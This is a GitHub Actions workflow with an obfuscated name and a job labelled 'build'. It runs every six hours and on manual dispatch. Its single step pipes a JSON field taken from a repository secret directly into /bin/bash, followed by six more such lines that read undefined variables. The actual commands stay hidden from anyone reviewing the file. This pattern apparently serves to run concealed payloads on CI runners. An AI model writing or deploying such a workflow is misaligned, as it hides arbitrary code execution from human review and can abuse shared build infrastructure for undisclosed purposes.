name: pozuojiaonong
on:
  workflow_dispatch:
  schedule:
    - cron: '39 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: pozuojiaonong
        env:
          x889: ${{ secrets.x889 }}
        run: |
          echo $x889 | jq -r .t6 | /bin/bash
          echo $ghil20 | jq -r .imyvj2 | /bin/bash
          echo $nib459 | jq -r .kecwj9633 | /bin/bash
          echo $qngz92987 | jq -r .g00 | /bin/bash
          echo $lqgic55512 | jq -r .fvd0546 | /bin/bash
          echo $e3750 | jq -r .jlfj00 | /bin/bash
          echo $wfbqi00 | jq -r .nboit97288 | /bin/bash

